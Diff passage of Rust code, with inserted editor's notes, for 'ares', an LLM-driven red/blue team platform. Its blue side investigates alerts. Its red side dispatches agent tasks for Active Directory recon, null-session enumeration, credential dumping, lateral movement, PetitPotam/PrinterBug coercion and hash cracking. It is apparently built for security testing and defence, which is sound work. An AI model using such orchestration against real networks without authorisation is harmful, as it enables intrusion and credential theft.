+                warn!("Stale cleanup: failed to read active investigations: {e}");
+                return;
+            }
+        };
+
+        if active_ids.is_empty() {
+            return;
+        }
+
+        let now = chrono::Utc::now();
+        let mut cleaned = 0u32;
+
+        for inv_id in &active_ids {
+            let status_key = format!("ares:blue:inv:{inv_id}:status");
+            let status_json: Option<String> = conn.get(&status_key).await.unwrap_or(None);
+
+            let status_obj = match status_json
+                .as_deref()
+                .and_then(|s| serde_json::from_str::<serde_json::Value>(s).ok())
+            {
+                Some(v) => v,
+                None => continue,
+            };
+
+            let status = status_obj
+                .get("status")
+                .and_then(|v| v.as_str())
+                .unwrap_or("");
+            if status != "in_progress" {
+                continue;
+            }
+
+            let started_at = status_obj
+                .get("started_at")
+                .and_then(|v| v.as_str())
+                .and_then(|s| chrono::DateTime::parse_from_rfc3339(s).ok())
+                .map(|dt| dt.with_timezone(&chrono::Utc));
+
+            let elapsed_secs = match started_at {
+                Some(dt) => (now - dt).num_seconds(),
+                None => STALE_INVESTIGATION_THRESHOLD_SECS + 1, // no timestamp = assume stale
+            };
+
+            if elapsed_secs > STALE_INVESTIGATION_THRESHOLD_SECS {
+                let hours = elapsed_secs as f64 / 3600.0;
+                let error_msg = format!(
+                    "Investigation orphaned after orchestrator restart (was running {hours:.1}h)"
+                );
+
+                // Update status to failed
+                let updated = serde_json::json!({
+                    "status": "failed",
+                    "started_at": status_obj.get("started_at").unwrap_or(&serde_json::Value::Null),
+                    "failed_at": now.to_rfc3339(),
+                    "error": error_msg,
+                });
+                let data = serde_json::to_string(&updated).unwrap_or_default();
+                let _: Result<(), _> = conn.set_ex::<_, _, ()>(&status_key, &data, 86400).await;
+
+                // Remove from active set
+                let _: Result<(), _> = conn
+                    .srem::<_, _, ()>(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS, inv_id)
+                    .await;
+
+                warn!(
+                    investigation_id = %inv_id,
+                    elapsed_hours = format!("{hours:.1}"),
+                    "Marked stale investigation as failed"
+                );
+                cleaned += 1;
+            }
+        }
+
+        if cleaned > 0 {
+            info!(count = cleaned, "Stale investigation cleanup complete");
+        }
+    }
+
+    /// Run the blue team orchestration loop until shutdown.
+    ///
+    /// Polls `ares:blue:investigations` for new investigation requests.
+    /// Each request contains an alert payload and LLM model to use.
+    pub async fn run(&self, mut shutdown_rx: watch::Receiver<bool>) -> Result<()> {
+        info!("Blue team orchestrator starting");
+
+        // Clean up stale investigations from previous runs
+        self.cleanup_stale_investigations().await;
+
+        let mut task_queue = BlueTaskQueue::connect(&self.redis_url)
+            .await
+            .context("Failed to connect blue task queue to Redis")?;
+
+        let mut retry_delay = Duration::from_secs(1);
+        let max_retry_delay = Duration::from_secs(30);
+        let mut last_stale_check = std::time::Instant::now();
+
+        loop {
+            // Check shutdown
+            if *shutdown_rx.borrow() {
+                info!("Blue orchestrator: shutdown signalled");
+                break;
+            }
+
+            // Poll for investigation requests
+            let poll_result = tokio::select! {
+                result = task_queue.pop_investigation_request(5.0) => result,
+                _ = shutdown_rx.changed() => {
+                    info!("Blue orchestrator: shutdown during poll");
+                    break;
+                }
+            };
+
+            match poll_result {
+                Ok(Some(request)) => {
+                    retry_delay = Duration::from_secs(1);
+
+                    let investigation_id = request
+                        .get("investigation_id")
+                        .and_then(|v| v.as_str())
+                        .map(String::from)
+                        .unwrap_or_else(|| uuid::Uuid::new_v4().to_string());
+
+                    let alert = request
+                        .get("alert")
+                        .cloned()
+                        .unwrap_or(serde_json::json!({}));
+
+                    let raw_model = request
+                        .get("model")
+                        .and_then(|v| v.as_str())
+                        .filter(|s| !s.is_empty())
+                        .unwrap_or(&self.model_name);
+                    // Strip provider prefix (e.g. "openai/gpt-5.2" → "gpt-5.2")
+                    let model = raw_model
+                        .split_once('/')
+                        .map(|(_, name)| name)
+                        .unwrap_or(raw_model)
+                        .to_string();
+
+                    let operation_id = request
+                        .get("operation_id")
+                        .and_then(|v| v.as_str())
+                        .map(String::from);
+
+                    // Report directory: request > ARES_REPORT_DIR env > ~/.ares/reports/
+                    let report_dir = request
+                        .get("report_dir")
+                        .and_then(|v| v.as_str())
+                        .map(String::from)
+                        .or_else(|| std::env::var("ARES_REPORT_DIR").ok());
+
+                    info!(
+                        investigation_id = %investigation_id,
+                        model = %model,
+                        operation_id = ?operation_id,
+                        "Received investigation request"
+                    );
+
+                    // Register the investigation
+                    if let Err(e) = task_queue
+                        .register_investigation(&investigation_id, &alert, &model)
+                        .await
+                    {
+                        warn!(err = %e, "Failed to register investigation");
+                    }
+
+                    // Run the investigation
+                    let investigation = Investigation::new(
+                        investigation_id.clone(),
+                        alert,
+                        model,
+                        operation_id,
+                        report_dir,
+                    );
+
+                    let mut conn = redis::Client::open(self.redis_url.as_str())?
+                        .get_connection_manager()
+                        .await?;
+
+                    match tokio::time::timeout(
+                        Duration::from_secs(INVESTIGATION_TIMEOUT_SECS),
+                        investigation::run_investigation(
+                            &investigation,
+                            Arc::clone(&self.provider),
+                            Arc::clone(&self.dispatcher),
+                            &mut task_queue,
+                            &self.redis_url,
+                            &mut conn,
+                        ),
+                    )
+                    .await
+                    {
+                        Ok(Ok(outcome)) => {
+                            info!(
+                                investigation_id = %investigation_id,
+                                outcome = ?outcome,
+                                "Investigation finished"
+                            );
+                        }
+                        Ok(Err(e)) => {
+                            error!(
+                                investigation_id = %investigation_id,
+                                err = %e,
+                                "Investigation failed with error"
+                            );
+                        }
+                        Err(_elapsed) => {
+                            error!(
+                                investigation_id = %investigation_id,
+                                timeout_secs = INVESTIGATION_TIMEOUT_SECS,
+                                "Investigation timed out — cancelling"
+                            );
+
+                            // Write timed_out status so downstream consumers know
+                            // what happened (the future was dropped before it could
+                            // write its own final status).
+                            investigation
+                                .state_writer
+                                .set_status(
+                                    &mut conn,
+                                    "timed_out",
+                                    Some("Investigation exceeded timeout"),
+                                )
+                                .await
+                                .ok();
+
+                            // Release the lock that was acquired inside the
+                            // now-cancelled future.
+                            investigation
+                                .state_writer
+                                .release_lock(&mut conn)
+                                .await
+                                .ok();
+                            // Generate a partial report from whatever evidence was
+                            // collected before the timeout.
+                            investigation::generate_report(
+                                &mut conn,
+                                &investigation.investigation_id,
+                                investigation.report_dir.as_deref(),
+                            )
+                            .await;
+                        }
+                    }
+
+                    // Clean up active investigation registration
+                    let _: Result<(), _> = conn
+                        .srem::<_, _, ()>(
+                            ares_core::state::BLUE_ACTIVE_INVESTIGATIONS,
+                            &investigation_id,
+                        )
+                        .await;
+                }
+                Ok(None) => {
+                    retry_delay = Duration::from_secs(1);
+                    // Periodic stale investigation cleanup
+                    if last_stale_check.elapsed() >= Duration::from_secs(STALE_CHECK_INTERVAL_SECS)
+                    {
+                        self.cleanup_stale_investigations().await;
+                        last_stale_check = std::time::Instant::now();
+                    }
+                }
+                Err(e) => {
+                    let error_str = e.to_string().to_lowercase();
+                    let is_conn_error = ["connection", "closed", "timeout", "broken", "reset"]
+                        .iter()
+                        .any(|kw| error_str.contains(kw));
+
+                    if is_conn_error {
+                        warn!(
+                            delay_secs = retry_delay.as_secs(),
+                            "Blue orchestrator: connection error, will reconnect: {e}"
+                        );
+                        tokio::select! {
+                            _ = tokio::time::sleep(retry_delay) => {}
+                            _ = shutdown_rx.changed() => break,
+                        }
+                        retry_delay = (retry_delay * 2).min(max_retry_delay);
+
+                        // Reconnect the task queue — the previous ConnectionManager
+                        // can be stuck after Redis restarts or prolonged outages.
+                        match BlueTaskQueue::connect(&self.redis_url).await {
+                            Ok(new_queue) => {
+                                task_queue = new_queue;
+                                info!("Blue orchestrator: reconnected to Redis");
+                            }
+                            Err(reconnect_err) => {
+                                warn!("Blue orchestrator: reconnect failed: {reconnect_err}");
+                            }
+                        }
+                    } else {
+                        error!("Blue orchestrator: non-connection error: {e}");
+                        tokio::time::sleep(Duration::from_secs(5)).await;
+                    }
+                }
+            }
+        }
+
+        info!("Blue team orchestrator stopped");
+        Ok(())
+    }
+}
+
+/// Spawn the blue team orchestrator as a background tokio task.
+///
+/// Returns a `JoinHandle` that resolves when the orchestrator stops.
+pub fn spawn_blue_orchestrator(
+    provider: Box<dyn LlmProvider>,
+    model_name: String,
+    dispatcher: Arc<dyn ToolDispatcher>,
+    redis_url: String,
+    shutdown_rx: watch::Receiver<bool>,
+) -> tokio::task::JoinHandle<()> {
+    tokio::spawn(async move {
+        let orchestrator = BlueOrchestrator::new(provider, model_name, dispatcher, redis_url);
+        if let Err(e) = orchestrator.run(shutdown_rx).await {
+            error!("Blue orchestrator exited with error: {e}");
+        }
    })
+}
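Editor's note: the shutdown contract above — a `watch::Receiver<bool>` checked both before and during polling — is the piece callers have to wire up. A standalone sketch of that wiring with a stand-in worker loop in place of the real orchestrator:

```rust
use std::time::Duration;
use tokio::sync::watch;

// Hypothetical wiring for the shutdown channel spawn_blue_orchestrator()
// expects; the spawned loop below is a stand-in for the orchestrator.
#[tokio::main]
async fn main() {
    let (shutdown_tx, mut shutdown_rx) = watch::channel(false);

    let handle = tokio::spawn(async move {
        loop {
            if *shutdown_rx.borrow() {
                break; // same check the orchestrator loop performs each iteration
            }
            tokio::select! {
                _ = tokio::time::sleep(Duration::from_secs(5)) => { /* poll for work */ }
                _ = shutdown_rx.changed() => { /* re-check borrow() on next pass */ }
            }
        }
    });

    // ... run until some stop condition, then signal and join:
    shutdown_tx.send(true).ok();
    handle.await.expect("orchestrator task panicked");
}
```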
diff --git a/ares-cli/src/orchestrator/blue/sub_agent.rs b/ares-cli/src/orchestrator/blue/sub_agent.rs
new file mode 100644
index 00000000..9f7ec3ef
--- /dev/null
+++ b/ares-cli/src/orchestrator/blue/sub_agent.rs
@@ -0,0 +1,140 @@
+//! Infrastructure wrapper types for blue team sub-agent dispatch.
+//!
+//! - [`BlueToolDispatcher`] — wraps the red-team dispatcher and routes blue
+//!   tool names to `ares_tools::blue::dispatch_blue()` for local execution.
+//! - [`SubAgentCallbackHandler`] — minimal callback handler for blue
+//!   sub-agents that handles lifecycle completion tools and tracks token usage.
+
+use std::sync::Arc;
+
+use anyhow::Result;
+use tracing::{debug, warn};
+
+use ares_llm::agent_loop::CallbackResult;
+use ares_llm::{CallbackHandler, TokenUsage, ToolCall, ToolDispatcher, ToolExecResult};
+
+use super::callbacks::BlueCallbackHandler;
+
+// ---------------------------------------------------------------------------
+// Blue-aware tool dispatcher wrapper
+// ---------------------------------------------------------------------------
+
+/// Timeout for individual blue tool executions (e.g. Loki/Grafana queries).
+const BLUE_TOOL_TIMEOUT_SECS: u64 = 120;
+
+/// Wraps an existing (red-team) dispatcher and intercepts blue tool names,
+/// routing them to `ares_tools::blue::dispatch_blue()` for local execution.
+/// Non-blue tools fall through to the inner dispatcher.
+pub(super) struct BlueToolDispatcher {
+    pub(super) inner: Arc<dyn ToolDispatcher>,
+}
+
+#[async_trait::async_trait]
+impl ToolDispatcher for BlueToolDispatcher {
+    async fn dispatch_tool(
+        &self,
+        role: &str,
+        task_id: &str,
+        call: &ToolCall,
+    ) -> Result<ToolExecResult> {
+        if ares_tools::blue::is_blue_tool(&call.name) {
+            debug!(tool = %call.name, "Executing blue tool locally");
+            match tokio::time::timeout(
+                std::time::Duration::from_secs(BLUE_TOOL_TIMEOUT_SECS),
+                ares_tools::blue::dispatch_blue(&call.name, &call.arguments),
+            )
+            .await
+            {
+                Ok(Ok(output)) => Ok(ToolExecResult {
+                    output: output.combined(),
+                    error: if output.success {
+                        None
+                    } else {
+                        Some(format!("tool exited with code {:?}", output.exit_code))
+                    },
+                    discoveries: None,
+                }),
+                Ok(Err(e)) => Ok(ToolExecResult {
+                    output: String::new(),
+                    error: Some(e.to_string()),
+                    discoveries: None,
+                }),
+                Err(_elapsed) => {
+                    warn!(
+                        tool = %call.name,
+                        timeout_secs = BLUE_TOOL_TIMEOUT_SECS,
+                        "Blue tool execution timed out"
+                    );
+                    Ok(ToolExecResult {
+                        output: format!(
+                            "Tool execution timed out after {BLUE_TOOL_TIMEOUT_SECS}s. \
+                             The data source may be unreachable. Try a simpler query or skip this step."
+                        ),
+                        error: Some("timeout".to_string()),
+                        discoveries: None,
+                    })
+                }
+            }
+        } else {
+            self.inner.dispatch_tool(role, task_id, call).await
+        }
+    }
+}
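Editor's note: the timeout handling above deliberately converts a timeout into a successful `Ok` carrying a "soft failure" message the agent can react to, rather than an error that would abort the loop. The generic pattern, reduced to a standalone sketch (names are illustrative):

```rust
use std::time::Duration;

// Stand-in for the patch's ToolExecResult.
struct ExecResult {
    output: String,
    error: Option<String>,
}

/// Run a tool future under a deadline; on timeout, return a structured
/// soft failure instead of propagating an error.
async fn run_with_timeout<F>(tool: F, secs: u64) -> ExecResult
where
    F: std::future::Future<Output = String>,
{
    match tokio::time::timeout(Duration::from_secs(secs), tool).await {
        Ok(output) => ExecResult { output, error: None },
        Err(_elapsed) => ExecResult {
            output: format!("Tool execution timed out after {secs}s."),
            error: Some("timeout".to_string()),
        },
    }
}

#[tokio::main]
async fn main() {
    let slow = async {
        tokio::time::sleep(Duration::from_secs(10)).await;
        "done".to_string()
    };
    let res = run_with_timeout(slow, 1).await;
    assert_eq!(res.error.as_deref(), Some("timeout"));
    println!("{}", res.output);
}
```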
+// ---------------------------------------------------------------------------
+// Sub-agent callback handler (lifecycle callbacks only)
+// ---------------------------------------------------------------------------
+
+/// Minimal callback handler for blue sub-agents (triage, threat_hunter, etc.).
+///
+/// Recognizes lifecycle completion tools (`triage_complete`, `hunt_complete`,
+/// `lateral_complete`, etc.) so they end the sub-agent loop with `TaskComplete`
+/// instead of falling through to the Redis dispatcher.
+///
+/// Also tracks token usage per-investigation so blue team cost is visible.
+pub(super) struct SubAgentCallbackHandler {
+    pub(super) investigation_id: String,
+    pub(super) redis_url: String,
+}
+
+#[async_trait::async_trait]
+impl CallbackHandler for SubAgentCallbackHandler {
+    fn is_callback(&self, tool_name: &str) -> bool {
+        matches!(
+            tool_name,
+            "triage_complete"
+                | "hunt_complete"
+                | "lateral_complete"
+                | "complete_investigation"
+                | "confirm_escalation"
+                | "downgrade_escalation"
+                | "request_reinvestigation"
+                | "route_to_team"
+        )
+    }
+
+    async fn handle_callback(&self, call: &ToolCall) -> Option<Result<CallbackResult>> {
+        BlueCallbackHandler::handle_lifecycle_callback(call).map(Ok)
+    }
+
+    async fn on_token_usage(&self, usage: &TokenUsage, model: &str) {
+        if usage.input_tokens == 0 && usage.output_tokens == 0 {
+            return;
+        }
+        if let Ok(client) = redis::Client::open(self.redis_url.as_str()) {
+            if let Ok(mut conn) = client.get_connection_manager().await {
+                if let Err(e) = ares_core::token_usage::increment_blue_token_usage(
+                    &mut conn,
+                    &self.investigation_id,
+                    usage.input_tokens.into(),
+                    usage.output_tokens.into(),
+                    model,
+                )
+                .await
+                {
+                    warn!(err = %e, "Failed to record blue sub-agent token usage");
+                }
+            }
+        }
+    }
+}
diff --git a/ares-cli/src/orchestrator/bootstrap.rs b/ares-cli/src/orchestrator/bootstrap.rs
new file mode 100644
index 00000000..bee94e47
--- /dev/null
+++ b/ares-cli/src/orchestrator/bootstrap.rs
@@ -0,0 +1,164 @@
+use std::sync::Arc;
+
+use anyhow::Result;
+use redis::AsyncCommands;
+use tracing::{info, warn};
+
+use crate::orchestrator::config::OrchestratorConfig;
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::task_queue::TaskQueue;
+
+/// Probe target IPs on port 88 (Kerberos) then 389 (LDAP) to find a real DC.
+/// Returns the first IP that accepts a TCP connection within 500ms.
+pub(crate) async fn probe_dc_port(ips: &[String]) -> Option<String> {
+    for port in [88u16, 389] {
+        for ip in ips {
+            let addr = format!("{ip}:{port}");
+            if let Ok(Ok(_)) = tokio::time::timeout(
+                std::time::Duration::from_millis(500),
+                tokio::net::TcpStream::connect(&addr),
+            )
+            .await
+            {
+                info!(ip = %ip, port = port, "DC probe: port open");
+                return Some(ip.clone());
+            }
+        }
+    }
+    None
+}
+/// Write initial operation metadata to Redis so workers can discover the operation.
+///
+/// Mirrors the Python `_initialize_state_and_persist()` in `_orchestrator.py`.
+pub(crate) async fn bootstrap_meta(queue: &TaskQueue, config: &OrchestratorConfig) -> Result<()> {
+    use chrono::Utc;
+
+    let mut conn = queue.connection();
+    let meta_key = format!(
+        "{}:{}:{}",
+        ares_core::state::KEY_PREFIX,
+        config.operation_id,
+        "meta"
+    );
+
+    let now = Utc::now().to_rfc3339();
+
+    // started_at must only be set once — use HSETNX so restarts/recoveries
+    // don't overwrite the original start time (which would break runtime calc).
+    let started_at_json = serde_json::to_string(&now).unwrap_or_default();
+    let _: bool = conn
+        .hset_nx(&meta_key, "started_at", &started_at_json)
+        .await?;
+
+    // Remaining fields are safe to overwrite on restart
+    let fields: Vec<(&str, String)> = vec![
+        ("initialized", "true".to_string()),
+        (
+            "target_domain",
+            serde_json::to_string(&config.target_domain).unwrap_or_default(),
+        ),
+        (
+            "target_ip",
+            serde_json::to_string(config.target_ips.first().unwrap_or(&String::new()))
+                .unwrap_or_default(),
+        ),
+        (
+            "target_ips",
+            serde_json::to_string(&config.target_ips.join(",")).unwrap_or_default(),
+        ),
+    ];
+
+    for (field, value) in &fields {
+        let _: () = conn.hset(&meta_key, *field, value).await?;
+    }
+    // 24h TTL
+    let _: () = conn.expire(&meta_key, 86400).await?;
+
+    // Set active operation pointer for worker discovery
+    let _: () = conn.set("ares:op:active", &config.operation_id).await?;
+
+    // Write operation status key (matches Python's status tracking)
+    ares_core::state::set_operation_status(&mut conn, &config.operation_id, "running").await?;
+
+    // Store the LLM model name for worker discovery and recovery
+    let model_key = format!(
+        "{}:{}:{}",
+        ares_core::state::KEY_PREFIX,
+        config.operation_id,
+        ares_core::state::KEY_MODEL,
+    );
+    let model_name = std::env::var("ARES_LLM_MODEL").unwrap_or_default();
+    if !model_name.is_empty() {
+        let _: () = conn.set_ex(&model_key, &model_name, 86400u64).await?;
+    }
+
+    info!(
+        operation_id = %config.operation_id,
+        meta_key = %meta_key,
+        "Operation metadata written to Redis"
+    );
+    Ok(())
+}
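Editor's note: the HSETNX trick above is the whole idempotency story for `started_at` — first writer wins, so a restart can never clobber the original timestamp. A minimal standalone demo of the same call against a local Redis (key name is illustrative):

```rust
use redis::AsyncCommands;

// Demonstrates the set-once semantics bootstrap_meta() relies on.
#[tokio::main]
async fn main() -> anyhow::Result<()> {
    let client = redis::Client::open("redis://127.0.0.1/")?;
    let mut conn = client.get_connection_manager().await?;

    let key = "demo:op:meta";
    let first: bool = conn
        .hset_nx(key, "started_at", "2026-04-17T08:00:00Z")
        .await?;
    let second: bool = conn
        .hset_nx(key, "started_at", "2026-04-17T09:00:00Z")
        .await?;

    assert!(first); // field was created
    assert!(!second); // second write is a no-op — the original timestamp survives
    Ok(())
}
```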
+/// Dispatch initial recon tasks for each target IP.
+///
+/// This seeds the reactive automation pipeline — without these initial tasks,
+/// all automation tasks have nothing to work with on a fresh operation.
+pub(crate) async fn dispatch_initial_recon(
+    dispatcher: &Arc<Dispatcher>,
+    config: &OrchestratorConfig,
+) -> usize {
+    let mut count = 0;
+    let domain = &config.target_domain;
+
+    // Network scan + SMB sweep + SMB signing check per target IP.
+    // smb_sweep (NetExec) is critical: it discovers hostnames, OS, and DCs
+    // from SMB banners — data that nmap alone may miss.
+    for ip in &config.target_ips {
+        match dispatcher
+            .request_recon(
+                ip,
+                domain,
+                &["network_scan", "smb_sweep", "smb_signing_check"],
+                None,
+            )
+            .await
+        {
+            Ok(Some(task_id)) => {
+                info!(task_id = %task_id, ip = %ip, "Dispatched initial recon");
+                count += 1;
+            }
+            Ok(None) => {
+                warn!(ip = %ip, "Initial recon throttled/deferred");
+            }
+            Err(e) => {
+                warn!(ip = %ip, err = %e, "Failed to dispatch initial recon");
+            }
+        }
+    }
+
+    // User enumeration against all target IPs — we don't know which are DCs yet,
+    // and non-DC IPs may silently return no output. Null session for bootstrap.
+    for ip in &config.target_ips {
+        let payload = serde_json::json!({
+            "target_ip": ip,
+            "domain": domain,
+            "techniques": ["user_enumeration"],
+            "null_session": true,
+        });
+        match dispatcher
+            .throttled_submit("recon", "recon", payload, 5)
+            .await
+        {
+            Ok(Some(task_id)) => {
+                info!(task_id = %task_id, ip = %ip, "Dispatched user enumeration");
+                count += 1;
+            }
+            Ok(None) => warn!(ip = %ip, "User enumeration throttled/deferred"),
+            Err(e) => warn!(ip = %ip, err = %e, "Failed to dispatch user enumeration"),
+        }
+    }
+
+    count
+}
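Editor's note: the dispatch tools in the next file build stub `Credential` records from LLM-provided arguments before handing them to the `Dispatcher`. The real type lives in `ares_core::models`; a local stand-in sketch of the construction pattern, with the patch's conservative defaults called out:

```rust
// Stand-in mirroring the fields the dispatch tools populate — not the
// ares_core::models::Credential definition itself.
#[derive(Debug)]
struct Credential {
    id: String,
    username: String,
    password: String,
    domain: String,
    source: String,
    is_admin: bool,
}

fn stub_credential(username: &str, password: &str, domain: &str) -> Credential {
    Credential {
        id: uuid::Uuid::new_v4().to_string(), // fresh id per dispatch, as in the patch
        username: username.to_string(),
        password: password.to_string(),
        domain: domain.to_string(),
        source: String::new(), // provenance unknown at dispatch time
        is_admin: false,       // never assumed — established later from tool output
    }
}

fn main() {
    let cred = stub_credential("jsmith", "Summer2026!", "CORP");
    println!("{cred:?}");
}
```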
call.arguments["username"].as_str().unwrap_or(""); + let password = call.arguments["password"].as_str().unwrap_or(""); + let domain = call.arguments["domain"].as_str().unwrap_or(""); + + let cred = ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: password.to_string(), + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + + let task_id = dispatcher + .request_lateral(target_ip, &cred, technique) + .await?; + + info!( + technique = technique, + target_ip = target_ip, + "Dispatched lateral movement task" + ); + Ok(CallbackResult::Continue(format!( + "Lateral movement ({technique}) dispatched to {target_ip}: {}", + task_id.as_deref().unwrap_or("queued") + ))) + } + + pub(super) async fn dispatch_exploit(&self, call: &ToolCall) -> Result { + let dispatcher = self + .dispatcher + .as_ref() + .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; + + let vuln_id = call.arguments["vuln_id"].as_str().unwrap_or(""); + let priority = call.arguments["priority"].as_i64().unwrap_or(3) as i32; + + // Look up vulnerability in state + let state = self.state.read().await; + let vuln = state.discovered_vulnerabilities.get(vuln_id); + + if let Some(vuln) = vuln { + let vuln = vuln.clone(); + drop(state); // Release lock before async dispatch + + let task_id = dispatcher.request_exploit(&vuln, priority).await?; + info!(vuln_id = vuln_id, "Dispatched exploit task"); + Ok(CallbackResult::Continue(format!( + "Exploit task for {} dispatched: {}", + vuln_id, + task_id.as_deref().unwrap_or("queued") + ))) + } else { + drop(state); + Ok(CallbackResult::Continue(format!( + "Vulnerability {vuln_id} not found in discovered vulnerabilities" + ))) + } + } + + pub(super) async fn dispatch_coercion(&self, call: &ToolCall) -> Result { + let dispatcher = self + .dispatcher + .as_ref() + .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; + + let target_ip = call.arguments["target_ip"].as_str().unwrap_or(""); + let listener_ip = call.arguments["listener_ip"].as_str().unwrap_or(""); + let techniques: Vec<&str> = call.arguments["techniques"] + .as_array() + .map(|arr| arr.iter().filter_map(|v| v.as_str()).collect()) + .unwrap_or_else(|| vec!["petitpotam", "printerbug"]); + + let task_id = dispatcher + .request_coercion(target_ip, listener_ip, &techniques) + .await?; + + info!(target_ip = target_ip, "Dispatched coercion task"); + Ok(CallbackResult::Continue(format!( + "Coercion task dispatched to {target_ip}: {}", + task_id.as_deref().unwrap_or("queued") + ))) + } + + /// record_credential is disabled — credentials come only from tool output parsing. + /// This handler exists as a safety net in case the LLM somehow invokes it. + pub(super) async fn record_credential(&self, _call: &ToolCall) -> Result { + warn!("record_credential called but disabled — credentials are auto-extracted from tool output"); + Ok(CallbackResult::Continue( + "This tool is disabled. Credentials are automatically extracted from tool output. \ + Focus on running tools that produce credential data (secretsdump, lsassy, netexec, etc.) \ + and the system will parse and store credentials automatically." + .to_string(), + )) + } + + /// record_timeline_event is disabled — timeline events are auto-generated from + /// state changes (credential/hash/host discoveries) in result_processing.rs. + /// This handler exists as a safety net in case the LLM somehow invokes it. 
+    pub(super) async fn record_timeline_event(&self, _call: &ToolCall) -> Result<CallbackResult> {
+        warn!("record_timeline_event called but disabled — timeline events are auto-generated from discoveries");
+        Ok(CallbackResult::Continue(
+            "This tool is disabled. Timeline events are automatically generated when \
+             credentials, hashes, and hosts are discovered from tool output. Focus on \
+             running attack tools and the system will build the timeline automatically."
+                .to_string(),
+        ))
+    }
+
+    pub(super) async fn dispatch_crack(&self, call: &ToolCall) -> Result<CallbackResult> {
+        let dispatcher = self
+            .dispatcher
+            .as_ref()
+            .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?;
+
+        let hash_value = call.arguments["hash_value"].as_str().unwrap_or("");
+        let hash_type = call.arguments["hash_type"].as_str().unwrap_or("ntlm");
+        let username = call.arguments["username"].as_str().unwrap_or("");
+        let domain = call.arguments["domain"].as_str().unwrap_or("");
+
+        let hash = ares_core::models::Hash {
+            id: uuid::Uuid::new_v4().to_string(),
+            username: username.to_string(),
+            hash_value: hash_value.to_string(),
+            hash_type: hash_type.to_string(),
+            domain: domain.to_string(),
+            cracked_password: None,
+            source: String::new(),
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+            aes_key: None,
+        };
+
+        let task_id = dispatcher.request_crack(&hash).await?;
+
+        info!(hash_type = hash_type, "Dispatched crack task");
+        Ok(CallbackResult::Continue(format!(
+            "Crack task dispatched for {username}@{domain} ({hash_type}): {}",
+            task_id.as_deref().unwrap_or("queued")
+        )))
+    }
+
+    /// report_cracked_credential is disabled — cracked passwords are extracted from
+    /// hashcat/john stdout via output_extraction.rs parsers. LLMs must never construct
+    /// credential data directly.
+    /// This handler exists as a safety net in case the LLM somehow invokes it.
+    pub(super) async fn report_cracked_credential(
+        &self,
+        _call: &ToolCall,
+    ) -> Result<CallbackResult> {
+        warn!("report_cracked_credential called but disabled — cracked passwords are auto-extracted from tool output");
+        Ok(CallbackResult::Continue(
+            "This tool is disabled. Cracked passwords are automatically extracted from \
+             hashcat and john output. Run the cracking tools and the system will parse \
+             and store cracked credentials automatically."
+                .to_string(),
+        ))
+    }
+}
diff --git a/ares-cli/src/orchestrator/callback_handler/mod.rs b/ares-cli/src/orchestrator/callback_handler/mod.rs
new file mode 100644
index 00000000..76c8a3e9
--- /dev/null
+++ b/ares-cli/src/orchestrator/callback_handler/mod.rs
@@ -0,0 +1,111 @@
+//! Orchestrator-specific callback handler for state query and dispatch tools.
+//!
+//! Implements `CallbackHandler` to handle tools that need in-memory state access:
+//!
+//! **Query tools** — read from SharedState (credentials, hashes, tasks, agent status)
+//! **Dispatch tools** — submit sub-tasks via the Dispatcher (recon, credential_access, etc.)
+//!
+//! These tools are available only to the orchestrator agent role.
+
+mod dispatch;
+mod query;
+#[cfg(test)]
+mod tests;
+
+use std::sync::Arc;
+
+use anyhow::Result;
+use tracing::warn;
+
+use ares_llm::provider::ToolCall;
+use ares_llm::{CallbackHandler, CallbackResult};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::SharedState;
+use crate::orchestrator::task_queue::TaskQueue;
+
+/// Callback handler for orchestrator LLM agent tools.
+///
+/// Provides direct access to shared state (for query tools) and the dispatcher
+/// (for sub-task submission) without going through Redis tool queues.
+pub struct OrchestratorCallbackHandler {
+    pub(super) state: SharedState,
+    pub(super) dispatcher: Option<Arc<Dispatcher>>,
+    pub(super) task_queue: Option<TaskQueue>,
+}
+
+impl OrchestratorCallbackHandler {
+    pub fn new(state: SharedState, task_queue: TaskQueue) -> Self {
+        Self {
+            state,
+            dispatcher: None,
+            task_queue: Some(task_queue),
+        }
+    }
+
+    #[cfg(test)]
+    pub fn new_for_test(state: SharedState) -> Self {
+        Self {
+            state,
+            dispatcher: None,
+            task_queue: None,
+        }
+    }
+
+    pub fn with_dispatcher(mut self, dispatcher: Arc<Dispatcher>) -> Self {
+        self.dispatcher = Some(dispatcher);
+        self
+    }
+}
+
+#[async_trait::async_trait]
+impl CallbackHandler for OrchestratorCallbackHandler {
+    async fn handle_callback(&self, call: &ToolCall) -> Option<Result<CallbackResult>> {
+        match call.name.as_str() {
+            // Query tools
+            "get_credential_summary" => Some(self.get_credential_summary().await),
+            "get_hash_summary" => Some(self.get_hash_summary().await),
+            "get_all_credentials" => Some(self.get_all_credentials(call).await),
+            "get_all_hashes" => Some(self.get_all_hashes(call).await),
+            "get_hash_value" => Some(self.get_hash_value(call).await),
+            "get_pending_tasks" => Some(self.get_pending_tasks().await),
+            "get_agent_status" => Some(self.get_agent_status().await),
+            "get_operation_summary" => Some(self.get_operation_summary().await),
+            // Recording tools — disabled stubs (see dispatch.rs); they return
+            // guidance text instead of persisting anything
+            "record_credential" => Some(self.record_credential(call).await),
+            "record_timeline_event" => Some(self.record_timeline_event(call).await),
+            // Dispatch tools
+            "dispatch_recon" => Some(self.dispatch_recon(call).await),
+            "dispatch_credential_access" => Some(self.dispatch_credential_access(call).await),
+            "dispatch_lateral_movement" => Some(self.dispatch_lateral(call).await),
+            "dispatch_privesc_exploit" => Some(self.dispatch_exploit(call).await),
+            "dispatch_coercion" => Some(self.dispatch_coercion(call).await),
+            "dispatch_crack" => Some(self.dispatch_crack(call).await),
+            // Cracker result — disabled stub; cracked passwords are parsed from
+            // hashcat/john output instead
+            "report_cracked_credential" => Some(self.report_cracked_credential(call).await),
+            // Not ours — let built-in handler take over
+            _ => None,
+        }
+    }
+
+    async fn on_token_usage(&self, usage: &ares_llm::TokenUsage, model: &str) {
+        if usage.input_tokens == 0 && usage.output_tokens == 0 {
+            return;
+        }
+        if let Some(ref queue) = self.task_queue {
